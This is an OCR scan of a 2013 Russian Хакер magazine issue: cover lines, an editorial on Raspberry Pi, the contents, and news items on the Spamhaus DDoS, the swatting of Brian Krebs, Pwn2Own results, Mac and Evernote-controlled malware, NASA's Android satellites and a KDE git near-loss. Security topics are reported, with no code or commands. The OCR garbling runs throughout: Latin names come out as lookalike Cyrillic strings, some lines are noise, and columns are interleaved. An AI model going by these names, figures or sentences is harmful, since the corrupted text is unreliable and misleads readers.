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ОБЛАЧНЫЕ 
СРЕДСТВА 
РАЗРАБОТКИ 


Как выжить 
разработчику, 
если есть только 
браузер 
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ПРОШАЙ, 
СООСЕЕ 
НВЕАОЕВ! 


Поднимаем 
альтернативную 
В$$-читалку в ответ 
на подлянку СооЧ!е’а 
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УДАЛЕННЫЙ 


КОНТРОЛЬ 2.0 


Управляем машиной 
с помощью @оод/е 
Тай, ТмлКег, Огорбох 
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Фейлы Чаума: самая 
полная история дыр 
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РУВИ$ЗНИМ@ РОВ 
ЕМТНОЗА$Т$ 


Без фантазии и упорства 
Вазроеггу Р! — железка 
бесполезная. Но мы 
расскажем, как этого 

не допустить 


МАЛИНОВЫЙ — ЭТО 
НОВЫЙЧЕРНЫЙ 


В новогоднем выпуске Назрбеггу Р! оказался в нашей 
подборке лучших подарков под номером три — просто 
потому, что подарки были расставлены по цене. На самом 
деле он должен был стоять под номером один. Дело в том, 
что мы еще не видели другой такой железки, которая бы так 
захватывала всех, кто к ней прикоснется. Журнал, который 
ты сейчас держишь в руках, — лучшее тому подтверждение. 

Жанр спецвыпуска сегодня не так актуален, как когда-то, 
но мы постарались сделать в этот раз нечто максимально 
похожее. В номер вошло интервью с создателем Вазрбету, 
два отличных НОМЛО и небольшой обзор бесконечной 
вселенной проектов для Вазрреггу Р!. Кроме того, на диске 
ты найдешь лучшие статьи по теме за прошлый год — также 
там две инструкции и обзор еще пяти аналогичных компью- 
теров (вдобавок к тем пяти, о которых мы рассказали в этом 
номере). Кажется, что-то получается, правда? 

Самое большое впечатление на меня произвел «вино- 
вник торжества» — Эбен Аптон (создатель Вазрбеггу Р\), 
который охотно согласился дать нам интервью, хотя до этого 
он ни разу не говорил с журналистами из России. Все 
прошло без какого-либо участия пресс-службы (собствен- 
но, всей РВ-активностью занимается его жена, Лиз) или 
совещаний с сотрудниками. Потому что никто не знает 
о Вазрбегту столько, сколько сам Аптон — и он максимально 
честно рассказал как об успехах проекта, так и о технических 
проблемах, с которыми столкнулись разработчики. УЗВ-стек 
скоро будет работать лучше, не волнуйтесь! И ОТ$ добавят! 
И возможно, даже исходники для видеодрайвера откроют — 
если Вгоаасот образумится. 

В редакции крутится уже три машинки, и мы наверняка 
еще не раз вернемся с каким-нибудь интересным проектом. 
Аты, в свою очередь, можешь обратить внимание на усло- 
вия нашего конкурса проектов. Это не только шанс выиграть 
Вазрбеиту Р!, но и возможность сделать действительно 
крутую статью для журнала. 


Илья Илембитов, 
шеф-редактор Х 
чулег.сот/ЛетЬБКо\у 
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ГОД ИЗ-ЗАОШИБКИ 
СПУСТЯ ПРИ ОБНОВЛЕНИИ 
СЕРВЕРОВ 
и ПРОЕКТ КОЕЕДВА 
и образовательный НЕ ПОТЕРЯЛ ВЕСЬ 
инструмент превратился 
в игрушку для гиков и когда СТ-АРХИВ 


наконец ИЗВ заработает так, 
какнадо? 


МАЛЕНЬКИЙ 


БРИТАНСКИЙ р 
ШПИОН = ВНИМАТЕЛЬНЫЙ Р! 


в автономную закладку с собствен- 


ным питанием, управлением по 5М$ Разворачиваем систему видеонаблюдения с помощью Вазрбету Р!и пакета МоНоп. Получен- 
и сохранением логов в Емегпоте. ная система способна распознавать движение в кадре и сохранять ролики в бооде Опуе. 


ЭБЕН АПТОН: 


«Мне исполнилось 35, ая всееше программирую по четыре часа каждый вечер. 
И именно благодаря такому подходу я вообще умею программировать» 


МЕСАМЕМ!$ 


КОЛОНКА СТЁПЫ ИЛЬИНА 
РВООЕ-ОЕ-СОМСЕРТ 

МАЛИНОВЫЙ {ПИРОГ, ПИТОН И ПИ} 
ЧТО ТВОРИТСЯ 

МАЛЕНЬКИЙ БРИТАНСКИЙ ШПИОН 
ВНИМАТЕЛЬНЫЙ Р! 

НЕПОБЕДИМАЯ АВМАДА 

ГОД СПУСТЯ 

В МИРЕ ЗАОБЛАЧНЫХ ШОЕЙ 

ПОКАЖИ ПРЯМО В БРАУЗЕРЕ! 
РАБОТА НАД ОШИБКАМИ 

РУМСЕОМ КЕЕРЕВ ГЛАЗАМИ СТАРТАПЕРА 
ДВОЕ ИЗ ЛАРЦА 

РОБОТ НАПОВОДКЕ 

ЕАЗУ НАСК 

ОБЗОР ЭКСПЛОЙТОВ 
ИНСТРУМЕНТАЦИЯ — ЭВОЛЮЦИЯ АНАЛИЗА 
РУТКИТЫ: ПОДРОБНЫЙ АНАЛИЗ 
000$ В КАРТИНКАХ 

В ПОИСКАХ ЛАЗЕЕК 
ЗЛОУМЫШЛЕННИКИ ВЫБИРАЮТ АМА 
КОЛОНКА АЛЕКСЕЯ СИНЦОВА 
Х-ТО0Е$ 

ПРЯМОЙ РАСПИЛ РЕЕСТРАМИМООМ!$ 
]|-ПРОВЕРКА 

СОМЕСИТ$0МЕ! 

ЗАДАЧИ НА СОБЕСЕДОВАНИЯХ 
ПРАКТИЧЕСКАЯ ПАРАНОЙЯ 
УДАЛЕННЫЙ КОНТРОЛЬ 2.0 
ВЕЖОВЫХ РУКАВИЦАХ 

КОЛЫБЕЛЬ ОБЛАКОВ 

ЗАЩИТА ВНУТРИ ПЕРИМЕТРА 
ДОСТУПНЫЙ ПОМОЩНИК 
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Все новое за последний месяц 

Про то, какя спам рассылал 

Подделка информации о дорожных пробках 

Вазрбегту Р': кактак получилось? 

Самые интересные проекты, связанные с Вазрбегту Р! 

Делаем закладку из Назрбеггу Р! 

Создаем систему видеонаблюдения на базе Вазрбегту Р! 

Нишевые друзья Вазретту Р! 

Интервью с Эбеном Аптоном, основателем ВазрЬеггу Р/Роипданоп 

Обзор облачных инструментов разработки 

Как делать презентации с помощью веб-технологий 

Поднимаем альтернативу Сбооде Веадег 

А доп Па$ бесоте иппарру Бесаизе Пе Па$ по [аи 

Тест-драйв Убити Тоисп и Ргеох 0$ на ба!аху Мехиз 

Управляем Апаго!а, используя консоль 

Хакерские секреты простых вещей 

Анализ свеженьких уязвимостей 

Основы основ об инструментации 

Рассматриваем современные тенденции развития руткитов и методы их обнаружения 
Разбираемся с цифрами по О)о$-атакам 

Тотальный гид по ВОМ Вазед Х$$ 

Впервые на арене: самая полная история дыр в известной платформе 
Стома$оигсто: Вид Воиту 

Тутилит для исследователей безопасности 

Внедряемся в святая святых системы, минуя стандартные механизмы 
Антивирусы против топового эксплойт-пака 

Прочитай эту статью, илитвои исходники умрут! 

Подборка интересных заданий, которые даютна собеседованиях 
Шифрование дисков с помощью сгур {зе ир/-УК$ 

Управляем удаленной машиной с помощью Сооде Так, ТмЩег, Огорбох и бооде+ 
Технологии безопасности \\М том Зегуег 2012 

Пошаговое руководство по развертыванию [аа$-сервиса на базе ОрепМебша 
Обеспечение безопасности канального уровня средствами коммутаторов С15с0 
Обзор планшета 30 АС9731С 

Тестируем беспроводную мышь А4ТЕСН @11-570НХ 

Вопросы и ответы 

8,5 Гб всякой всячины 


Удобные меб-сервисы 


Нефедова 


Новость месяца 
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Засрибикь «ОАК 
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Ричард Стинберген из СоБа!Теесот 
& Тесппо!оду (верхний провайдер 
СоцаЕ!аге) подтвердил, чтокним 

в сеть Т!ег 2 шелтрафик 300 Гбит/с, 
но заметил, что об угрозе для интер- 
нета речи нет, лишь возникли заторы 
внекоторых1ХР. 


Не @ Искг.сот 


АТАКА, КОТОРАЯ 
ПОТРЯСЛА СЕТЬ 


ТАКЛИ СТРАШЕН МОЩНЕЙШИЙ 000$ В ИСТОРИИ? 


конце марта мировые СМИ сообщили о «мощнейшей 
ОБоЗ-атаке в истории интернета» — ее жертвой стала 
компания Зратпаи$, которая ведет черные списки спам- 
серверов. Компания СюоицаНаге сообщила, что нейтра- 
лизовала ОбоЗ-атаку в 300 Гбит/с, реализованную с по- 
мощью тысяч открытых ОМ$-резолверов по всему миру. 
МУ Титез вообще заявила, что из-за атаки интернет стал 
работать медленнее. Но так ли страшно все было? 
Итак, кто-то атаковал компанию Зратпаиз$, и произошло 
это после того, как Зратпаи$ внесла в черные списки хостера 
Субегбипкег, уличив клиентов хостинга в рассылке спама. Один 
из руководителей Субегрипкег Свен Олаф Камфиус ответил 
на вопросы публики на своей странице в РГасероок, а также дал 


«Атакующая команда, вероятнее всего, наши 
соотечественники или ближайише соседи», — 
уверен Александр Лямин, создатель сервиса по 


фильтрации трафика Огафог 


интервью изданию Ме\мизмеек, где сообщил, что «представляет организаторов 
атаки, хотя сам не имеет к ней никакого отношения». По словам Камфиуса, 
атаку против борцов со спамом организовала коалиция хакеров из России, 
Украины, Китая, Западной Европы, США и Канады. Бедняг якобы несправед- 
ливо обвинили в рассылке спама. 

Эксперты, впрочем, никакого особенного беспокойства по поводу этой 
атаки не испытывают. Александр Лямин (НаТоаа 1аб) усомнился в заяв- 
ленной мощности атаки, сказав что более реальной ему кажется оценка 
в 120 Гбит/с: «Это полное повторение того, что мы видели в октябре 2010-го, 
с той лишь разницей, что это не рекурсивный запрос, а запрос АМ\. Актуаль- 
ная атака сопровождается ЗУМ Нооа в 10-20 Мпп/Сс, что указывает на наличие 
большой фермы подконтрольных серверов. Наша оценка — 100-150 штук. 
Группа, проводящая атаку, возникла на горизонте около полутора месяцев 
назад с цифрой 10-20 Гбит/с, постепенно наращивая скорости. 19 мар- 
та, в 6 утра, они пришли «в гости» к Огаюг на новом 
уровне 100 Гбит/с, Номзрес нейтрализовал ЦОР- 
составляющую, зупНооЧ отработали обычными ме- 
тодами — зупсооке$. С 19 марта в Рунете был мас- 
совый террор, пострадали многие магистральные 
операторы и крупные телекомы. Их имена у всех 
на слуху, но поскольку вопрос щепетильный — назы- 
вать их неэтично». 


ХАКЕР 05 /172/ 2013 МЕ УЛ 


МЕСТЬ 
БРАЙАНУ 
«РЕБСУ 


СОВРЕМЕННЫЕ СЕТЕВЫЕ «РАЗБОРКИ» ПЛАВНО ПЕРЕТЕКАЮТ 
В РЕАЛЬНУЮ ЖИЗНЬ 


аверняка тебе знакомо имя Брайана Кребса, ведь оно 
частенько упоминается на страницах журнала. Кребс — 
известный специалист по инфобезопасности, блогер 
и журналист. Однако и на именитого специалиста могут 
ополчиться хакеры. 

Началось все с банальной ОБо5$-атаки на сайт Кребса 
(КгебзопзесигИу.согп), но продолжилось куда необычнее. В компа- 
нию Ргдехс, которая обычно защищает ресурсы Кребса от ОБ)о5- 
атак, пришло письмо от ФБР с информацией, что на сайте раз- 
мещен нелегальный контент, и требованием немедленно закрыть 
ресурс. Письмо показалось Брайану странным, он связался с ФБР 
и узнал, что никаких писем они, разумеется, никому не отправля- 
ли. Но на этом вторжение в жизнь Кребса не закончилось. В один 
прекрасный день специалист вышел на крыльцо своего дома, где 
с удивлением обнаружил отряд спецназа $З\ММАТ, который в него, 
в Брайана, целился. Вскоре выяснилось, что полиция и спецназ 
прибыли по адресу Кребса после звонка в службу спасения 911, 
который якобы был совершен с его мобильного телефона. Неиз- 
вестный представился Кребсом и заявил, что «русские ворвались 
к нему в дом и убили его жену». Хакеры сумели подделать Са!ег 0 
и обманули определитель номера в полиции. К счастью, инцидент 
со спецназом удалось разрешить мирно, никто не пострадал. 


Кребс подозревает, что с ним воюютхозяева сервиса аб зоБоо+{.сот, 
которые рекламируют свои услуги по «удалению вражеских сайтов» 

и хвастаются тем, что могут выслать спецназ по любомуадресу (то есть 
занимаются такназываемым ЗМ/АТ*тингом). 


РУМИМИОМ И РМ/Мг МММ 


РЕЗУЛЬТАТЫ ДВУХ ХАКЕРСКИХ КОНКУРСОВ 


остоялись сразу два хакерских контеста, об итогах которых хо- 

телось бы тебе рассказать. Рит2О\мт в этом году отличался ре- 

кордным призовым фондом — более 500 тысяч долларов, а также 

измененными правилами: авторы эксплойтов обязались предо- 
ставить свой код организаторам конкурса. Похоже, такое положение вещей 
участников не огорчило. Деньги нашли своих обладателей благодаря следу- 
ющим взломам. 

Взломаны все заявленные на конкурс браузеры (в том числе Сооде 
Срготе на\\Мтпаом/$ 7, Мо2Ша Егеох на\\Мт7 и!Е1О на\/п8), кроме Арре За?ам. 
Мо7На и Соод!е уже закрыли обнаруженные участниками дырки. Чама взлома- 
ли целых четыре раза (Огасе уауа плагин на 1ЕЭ \М/Мп7). Досталось и плагинам 
Аадоре На$п и Адобе Веадегна 1ЕЭ \\Мп7. И уже традиционно от других участни- 
ков конкурса отличилась команда /УРЕМ Зеситу, заработав суммарно целых 
250 тысяч долларов. 

Риптит от Сооде прошел куда скромнее и, можно сказать, неудачнее. 
Призовой фонд в размере 3,14159 миллиона долларов так и остался в цело- 
сти — никто не сумел взломать Спготе О$ ни в номинации только браузер 
(110 тысяч), ни в номинации компрометация системы (использование любого 
компонента системы — 150 тысяч долларов). 
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Первую в истории Королев- 
скую премию для изобретателей 
получили разработчики сети 
Интернет: Тим Бернерс-Ли, Роберт 
Канн, Винт Серф, Луи Пузан и Марк 
Андриссен. 


«Каждый двадцатый ком- 
пьютер, имеющий антивирусную 
защиту, все же заражен тем или 
иным вирусом», — сообщает нам 
«Лаборатория Касперского». 


М!сго$оЯ опубликовала 
в Сети свою базу, содержащую 
40 785 патентов. Базу дополнили 
удобным поиском, дав сервису имя 
М!сгозой Рае Тгаскег Тоо1. 


Третий год подряд побе- 
дителем Еасероок Наскег Сир 
становится россиянин. На этот раз 
победу одержал Петр Митричев, 
выигрывавший конкурс в 2011 году. 


6 МЕУ/$ 


БЕЗУМНАЯ 


ФОТОКАМЕРА 


НЕОБЫЧНЫЙ ГАДЖЕТ С «КУСАЧЕЙ» ЦЕНОЙ 


роизводители гаджетов изощряются как могут, 

стремясь выпустить что-то необычное, новатор- 

ское, но вместе с тем полезное и функциональное. 

Фотокамера ЗипСюоица, пожалуй, соответствует 
всем этим критериям, хотя и с некоторой натяжкой. Признать- 
ся, более странное устройство представить трудно. 

Основная особенность ЗипСоца в том, что камере не нужна 
розетка для подзарядки. Заряжать камеру предлагается ис- 
пользуя встроенную солнечную батарею или генератор — ка- 
мера оснащается едва ли не педальным приводом :). В корпус 
устройства встроена ручка, которую пользователю предлагает- 


Все это было бы за- 


МИЛЛИАРД 


ЧЕЛОВЕК 
В МЕСЯЦ 


—> УоЧТиБе прео- 
долел очередную 
веху: аудитория 
сервиса пере- 
шагнула отметку 
в миллиард по- 
сетителей в ме- 


ся покрутить, чтобы выработать энергию. Впрочем, для самых бавно, если бы нецена сяц. Это около 
слабых духом, кто не готов крутить и ждать, пока выглянет солн- аппарата: смешная 15% населения 
це, все же предусмотрена и зарядка от порта ЦЗВ. миниатюрная камера земного шарма! 
Увы, мощными характеристиками этот необычный гаджет (ЗипСоца весит 200 г) Кстати, УочТибе 
похвастаться не может. Разрешение камеры всего 3 Мп (доступ- стоит 200 долла- гордо сообщил, 
ные значения светочувствительности — 150 100-800). Также ров, что, согласись, что если бы 
устройство оснащено жидкокристаллическим экраном и свето- несовсем подходит он был стра- 
диодной вспышкой. В качестве сменных носителей — карты $0 / этому «сувенирному» ной, то был бы 
ЗОНС. Камера выпускается в черном и белом вариантах. гаджету. третьим в мире 


по числу населе- 
ния после Китая 
и Индии :). 


НЕЗАЩИЩЕННЫХ 
УСТРОЙСТВ ДЛЯ 
ЭКСПЕРИМЕНТА 


Амбициозный проект сканирования 
всех |Р\у4-адресов щегте Сепзи$ 2012 за- 
вершен. Скан осуществлялся своеобраз- 
ным ботнетом из 420 тысяч незащищен- 
ных устройств. В результате получилось 
собрать 9 Тб данных, среди которых 10,5 
миллиарда ответов на обратный запрос 
ОМ$, 80 миллионов отпечатков ТСРЛР 
и 68 миллионов записей {гасегоще. 


Тре Рна{е Вау — самый по- Мо27Ша и Затзипд объявили, 
пулярный файлообменник в Сети, что ведут работу над браузерным 
заявил портал ТопптаЕгеак, проана- движком «нового поколения» Зегуо. 


лизировав статистику по файлооб- Движок создается с нуля и пишется 
менникам в Аеха. на языке Ви. 


МЕСАМЕ\/$ 
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НЕМНОГО О МАЛВАРИ 


В СЕТИ ЗАМЕЧЕНА ПАРА НЕОБЫЧНЫХ ВИРУСОВ 


егодня очень сложно уследить за постоянно меняющейся обстановкой в сфере 
разнообразной малвари. Информационные бюллетени от антивирусных ком- 
паний выходят практически ежедневно, без устали рапортуя о все новых зло- 
вредах, ботнетах, атаках и так далее. Однако в этом океане информации порой 
попадаются выбивающиеся из общего ряда сообщения, как правило означаю- 
щие, что кто-то сумел придумать нечто оригинальное даже в нашу безумную информаци- 
онную эпоху. Вот пара таких примеров за этот месяц. 

Эксперты компании 1едо, которая специализируется на защите «яблочной» продук- 
ции от заразы, обнаружили весьма неприятный троян Рищтеч. Для тех, кто последние не- 
сколько лет провел в бункере, напомню, что Мас’и уже давно перестали быть свободными 
от вирусов компьютерами, что признают даже в Арре (недаром ведь соответствующие 
строки пропали с сайта компании). Но вер- 
немся к трояну. Компания щедо сообщила, 
что зараза уже хорошо порезвилась на ма- 
шинах сотрудников Арре, Еасебоок, ТмЩег 
и многих других компаний, в число которых 
попали даже правительственные организа- 
ции. Причина такого размаха довольно про- 
ста — Римзхеа успешно использует ранее 
неизвестную уязвимость во встроенном 
в ОЗ Х средстве безопасности Саекеереги. 
Напомню, что последнее предназначено 
для контроля устанавливаемых программ 
и блокировки файловой системы от несанк- 
ционированной инсталляции. Рищахеа ис- 
НО обманывая пользует модифицированную версию ути- 

литы Ореп$$Н, причем еще и шифрует свои 

05 Х данные с помощью $З$Н. В системе хитрый 

троянец выдает себя за ПО СУР$ (применя- 

ется для управления печатью в Ипих и Мас), при этом, правда, устанавливаясь в «левую» 

папку. После инсталляции троян, как полагается, открывает сетевой канал для общения 
с удаленным командным сервером и ждет команд от хозяев. 

Еще одна довольно необычная малварь была замечена сотрудниками Тгепа Мсго. 
Как известно, зачастую основной проблемой ботнетов становится контроль над ними. Все 
управление сетью зомби-машин завязано на командные серверы, с потерей или блоки- 
ровкой которых, по сути, «теряется» и ботнет. Хакеры, конечно, уже не раз предпринимали 
попытки наладить какой-нибудь нестандартный метод управления армиями ботов. Спе- 
циалисты Тгепа Мсго выявили новую попытку такого рода. Бекдор, названый компанией 
\егпо{.А, управляется через... Еиетфще. Да-да, через тот самый удобный и безобидный 
сервис для заметок. Зловред подключается к специально созданному китайскому аккаун- 
ту, откуда операторы отдают ему команды. И никаких тебе «подозрительных коммуника- 
ций». Изящное решение. 


РшЕя2ей ис- 
пользует ранее 
неизвестную 
уязвимость во 
встроенном 
СатеКеерег, успеш- 


Стоит сказать, что мошенники пытались и продолжают пытаться находить нестандартные пути 
управления зараженными машинами. Кпримеру, известны случаи, когда Зкуди\уе использовали 
спамеры, ахозяева ботнетов управляли своими «армиями» через Тии(ег или вообще из-под Тог. 
Пределасовершенству определеннонет. 


КАСПЕРСКИЙ 
СОТРУДНИЧАЕТ 
СИНТЕРПОЛОМ 


—> «Лаборатория Касперского» отныне будет сотруд- 
ничать (оказывая консультации) с подразделением 
Интерпола, которое занимается расследованием пре- 
ступлений в сфере высоких технологий. 


ВИДЕОТРАНСЛЯЦИИ 
ЧЕРЕЗ ВИ ТОВНВЕМТ 


—> Брэм Коэн (создатель протокола ВИТотеп\) запа- 
тентовал новый протокол, предназначенный для по- 
токового вещания через Р2Р. Над протоколом Брэм 
работал более трех лет. Почти одновременно с этим 
стартовала и бета-версия сервиса для прямых видео- 
трансляций ВИТоггет Ц уе. 


ВИСОМ СТРЕМИТЕЛЬНО 
РАСТЕТ 


—> В прошлом номере мы сообщали, что курс крипто- 
валюты Вйсот уже добрался до отметки в 33 доллара. 
Кто бы мог подумать, что через месяц один ВС будет 
стоить 100 долларов и продолжит расти! Такой ажио- 
таж, увы, может вести к обвалу курса, ведь в прошлом 
году валюта уже «падала» с 31 до 2 долларов. 


$ МЕСАМЕ\/$ 


АМОВОШО В КОСМОСЕ 


НАСА РАСКРЫВАЕТ ПОДРОБНОСТИ О СВОИХ НЕОБЫЧНЫХ СПУТНИКАХ 


ебе наверняка хоть раз попадалась на глаза картин- 
ка, на которой советский и американский космо- 
навты сидят бок о бок, смотрят на далекую Землю 
и один грустно говорит другому: «Для них теперь 
важен не выход в космос, а выход нового телефона». Увы, про- 
гресс действительно пошел не совсем по тому пути, на который 
надеялись многие футурологи и фантасты. Но не все потеряно, 
и даже смартфоны на что-нибудь да сгодятся! Это подтвержда- 
ет НАСА, построившая на базе Апагоа-аппаратов... спутники. 

Разработка мини-спутников ЗРНЕВЕ$ (Зупспгопмеа Ро$Шоп 
Ноа, Епдаде, Веопет, Ехрептета! Зае!е5), в основе которых 
лежал смартфон Мехи$ $ на базе Апагоа, завершилась еще 
В 2011 году. Тогда на создание крохотных устройств (размером 
они примерно с волейбольный мяч) ушло всего полгода. И вот 
два года спустя НАСА наконец раскрыло подробности о том, 
как прошел запуск Апагоа в космос. Комментарии дал доктор 
Марк Мисире в интервью ресурсу Аг$ Тесптса. 

В целом проект увенчался успехом. На сегодняшний день 
два из трех построенных спутников используются на Между- 
народной космической станции для замера уровня шума и ра- 
диации, а также в качестве камер-телероботов. Как рассказал 
Мисире, использование смартфонов в качестве «мозга» спут- 
ников сильно облегчило обновление ПО, не говоря уже о сниже- 
нии стоимости процесса. Устройство на базе смартфона может 
быть самоуправляемым, то есть оно способно производить все 
необходимые замеры при минимальном участии человека. Ин- 
тегрированный в спутник смартфон сразу обеспечивает встро- 
енную камеру для съемки видео и фото, довольно мощный 
процессор для вычислений, а также соединение с космической 
станцией и центром управления полетами посредством \М-Н 
(!). Также выбор исследователей недаром пал на Апагоа — 
ОС идеально подошла для нужд проекта благодаря своей от- 
крытости и способности работать с аппаратным обеспечением, 
сильно отличающимся от обыкновенного мобильника. «С про- 
дуктом от Арре пришлось бы гораздо сложнее. К примеру, при- 
шлось бы изъять литиевую батарею и сделать так, чтобы он ра- 
ботал от щелочной... или заставить его работать с МИпаом/5 ХР 
без драйвера», — объяснил Мисире. 


Исследовательский 
центр МАЗА Ате$ очень 
удачно располо- 

жен — оннаходится 
буквально втрех милях 
отголовного офиса 
Соод/!е, такчто специ- 
алисты НАСА получили 
отсоседей — разработ- 
чиков АпагоА прямую 
помощь. 


Сейчас два Апаго4-спутника используются 
на МКС для замера уровня шума и радиации, 
а также в качестве камер-телероботов 
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ПИРАТЫ ШУ ТЯТ 


—> Новость о том, что Тпе Риае Вау перевозит свои 
серверы в Северную Корею, конечно же, оказалась 
шуткой (пусть и опубликованной задолго до первого 
апреля). Информацию опровергла сама администра- 
ция трекера, добавив: «Многим из вас стоит быть 
критичнее. Даже по отношению к нам». 


МАМООМ/Ь ВЕЧЕ — 
НАВСЕХ ТРЕКЕРАХ СЕТИ 


—> \ММпаомз Вие — кодовое название грядущего об- 
новления для М/паом/$ 8, и новый билд уже утек в Сеть 
(случайно или нет, история умалчивает). ВиНа 9364 х86 
Рге-Вееазе, в числе прочего, отличают улучшенный 
интерфейс Маго Ч! и пчетет Ехр/огег 11. Официаль- 
ный релиз состоится в июле. 


Бывввын а те вре ее ь 
Заза. Ш’ в пи Нан ии иииныга: Г:.] 


Е вт ыы =! =. 

= —==-ь а вы 
ыы 

ЗЕ си пои тролли Раш д. | Шо лая во 6 «а вороны 
Е мы вы а ЬЬЫЙ ы еел 


Пи ав ааа вы. вр рии са до 


СМЕШНОЙ БАГ 
ИЛИКАКУРОНИТЬИЕЗ 


—> Разработчики компании Опейпезау обнаружили, 
что |Е девятой версии падает, «увидев» на стра- 
нице вот такой, совершенно обычный кусок кода: 
.ацезйоптагк { Богаег-БоЦот: 1рх доКеа #555; юЮщ- 
те: 12рх; гот-ммеат: бо!4; со!ог:#Н 2558; } 


НОВИНКИ ОТ ВУЕРАЕО 


ЗНЕСА 


ИЯ ДЛЯ МАЛО 


иНаю — крупный игрок «железного» рынка, известный как в сег- 
менте домашних систем хранения, так и в сегменте корпоративно- 
го уровня. Недавно компания представила обновленную версию 
хранилищ Тега{фаНоп 5000, которые отличаются от предшествен- 
НИКОВ «антивирусностью». Устройства поставляются с предустановленным 
Ттепа Мсго Апёмги$ и единственные на рынке ведут сканирование в режиме 
реального времени. Это означает, что весь массив данных находится под на- 
блюдением и при обнаружении вируса зараженные файлы автоматически 
удаляются и изолируются в защищенной папке, чтобы предотвратить даль- 
нейшее распространение заразы. Это актуально в связи с растущей популяр- 
ностью политики «Випд Уоиг Омп Оемсе» (принеси свое устройство), когда 
сотрудники используют собственные смартфоны, планшеты и ноутбуки. 

Новые МА$ также укомплектованы ВиНаюо ЗигуеШапсе Маео Мападег — 
специализированным ПО для работы с системами видеонаблюдения. В об- 
новленной линейке представлены модели емкостью 4, 8 и 16 Тб. 


СННОМУМ 
РАССТАЕТСЯ 
С\М/ЕВКТ 


СООСЕЕ НАЧАЛА 


Врежимевидеонаблю- 
дения новая модель мо- 
жетпринимать картинку 
с 10 камер одновре- 
менно, причем каждый 


потокможетбыть до 30 
кадров всекунду 
е успела отгреметь новость о скором переходе браузе- 
ра Орега на движок \\ебКН, как с браузерной передовой 
пришли еще более интересные сводки. Корпорация боод!е 
сообщила миру, что СПИгоптит и операционная система 
Спготе О$ скоро уйдут с движка \М/ебкКи. Все вернулось на круги 
своя — главным браузером на \\МебКИ остается За?ап. 

Оказывается, в стане Соое работают над форком \ебК!’а, 
движком ВПК. Пока разработка находится на начальной стадии, 
и компания в первую очередь планирует доработать внутреннюю 
архитектуру движка, а также упростить его кодовую базу (из проекта 
уберут более семи тысяч файлов, а это порядка 4,5 миллиона строк 
кода). Впрочем, в блоге Сооде сказано, что никаких радикальных из- 
менений в ВК пока вносить не планируют, а значит, ни разработчи- 
ки, ни тем более пользователи фактически не почувствуют разницы 
между новым движком и \\/ебки. Впрочем, 
со временем в ВК должны будут появиться 
и отличия (какие — пока неизвестно). 

Сооде признает, что решение отказать- 
ся от ММерБкКи в пользу ВК было нелегким, 
и понимает, что смена движка может иметь 
значительные последствия для всего интер- 
нета. Компания поясняет, что одна из глав- 
ных причин перехода на новый движок — 
«многопроцессная» архитектура браузера 
и необходимость поддерживать множество 
версий Спгопит для разных платформ. 


Орегавновь подсу- 
етилась, на этотраз 
подтвердив свое 
намерение исполь- 
зовать движок В!пК 
всвоих собствен- 
ных разработках 
для мобильных 
истационарных 
устройств. 


« КСКТНЕ.- 


РОНСЕ 


Хр]оцег 


—> Впервые с 2003 года доход 
Арр!е (по результатам очередного 
квартала) уменьшился по срав- 
нению с показателями того же 
квартала в прошлом году. 


—> @ооч!е решила помочь 


владельцам взломанных сайтов 


советом. С этой целью компания 
начала публиковать материалы 
под общим названием «Нер Гог 
паскеа $Цез$». 


—> В 2012 году Мсго$оН 
и $Куре получили 75 тысяч за- 
просов с требованием выдать 


сведения о 137 тысячах аккаунтов. 


Больше всего запросов подали 
Турция и США. 


—> На первых порах сборку 
очков Соод!е С!а$$ будут про- 
изводить в США, анев Юго-Вос- 
точной Азии. Отчего-то бооЧе 
не спешит отдавать этот гаджет 
на аутсорс. 


то МЕСАМЕУ/Ы 


КРЕЕДВА 
НЕЛИШИЛСЯ @П- 
РЕПОЗИТОРИЕВ 


ДУШЕРАЗДИРАЮЩАЯ ИСТОРИЯ О СПАСЕНИИ ДАННЫХ ИВАЖНОСТИ БЭКАПОВ 


дминистрация проекта КОЕ поделилась подробно- 

стями недавнего инцидента, в ходе которого 1500 
Си-репозиториев проекта едва не канули в Лету. 

После обновления одного из серверов про- 

екта перезапуск виртуальной машины прошел 

неудачно. В результате была повреждена файловая систе- 

ма ех{4 на первичном СН-сервере и нарушилась целостность 


МИЛЛИОНАРОССИЯН 
первичного репозитория. Разумеется, это потянуло за собой ПОЛ ЬЗУЮТСЯ ИНТЕР- 
проблемы, подобно снежному кому. Содержимое первичного 

Ск-репозитория было разрушено, и данные в других репозито- Проблема заклю- Н ЕТО М Е. ЕДН ЕЕ: Н О 


риях также были повреждены. Но «вишенкой на торте» стало то, чалась в механизме 

что для резервного копирования применялась практика зерка- самоверификации, Фонд «Общественное мнение» подсчитал: 

лирования Сй-репозитория. Она успела автоматически «отзер- работающем при вы- в России прирост месячной аудитории ин- 

калить» убитые данные на все вторичные серверы, в результате полнении команд тернета (по сравнению с зимой 2011-2012 

чего все данные и там тоже превратились в бесполезную кашу. СИ, — оннерабо- годов) составил 11%. Это означает, 
Ситуация разрешилась чудом — нашли случайную копию тает для режима что ежедневно в Сеть выходят почти 43% 

данных проекта на еще не введенном в эксплуатацию новом «--итпитог». При зер- совершеннолетних жителей страны. К лету 

сервере. Тамошний скрипт не сумел связаться с проблемным калировании невы- 2013 года проникновение интернета в Рос- 

сервером, попав на его перезагрузку, и просто завершился, полняется проверка сии должно составить 66-67%. 

не успев натворить бед. целостности 


ии а" ОА АНИ ИРА се о 
|: 9 КетЕНА а Г = Бемовыя 


фе: ны МН сы бони. 


ПОЛЬЗОВАТЕЛЕЙ 
ГОВОРЯТ 
НАРУССКОМ ЯЗЫКЕ 


Русский язык стал вторым по попу- 
лярности (и распространенности) в ин- 
тернете: на нем общаются 5,9% всех 
пользователей в мире. Примерно столь- 
ко же людей предпочитают немецкий. 
А первое место с огромным отрывом 
вполне предсказуемо занимает англий- 
ский язык, на котором говорят 54,7% 


пользователей. 
Популярность пиратского 1САММ, занимающаяся рас- 
софта и не думает снижать- пределением новых доменных 
ся. По данным ОС, установок имен, делегировала Украине 
нелицензионного ПО стало в три кириллический домен .укр. В новой 
раза больше по сравнению с 2006 зоне ожидается около 200 тысяч 


годом. доменов. 


166 рублей заномер! 


Нас часто спрашивают: «В чем преимущество подписки?» ПОДП ИСКА 
Во-первых, это выгодно. Потерявшие совесть распространи- 

тели не стесняются продавать журнал за300 рублей ивыше. 6 месяцев 1110 р. 
Во-вторых, этоудобно. Не надо искатьжурнал впродаже 12 месяцев 1999 р. 


и бояться проморгать момент, когдавесьтиражуже разберут. 
В-третьих, это быстро (правда, это правило действуетне для 
всех): подписчикам свежий выпуск отправляется раньше, чем 
онпоявляется на прилавках магазинов. 


ИЕ ИЕ 
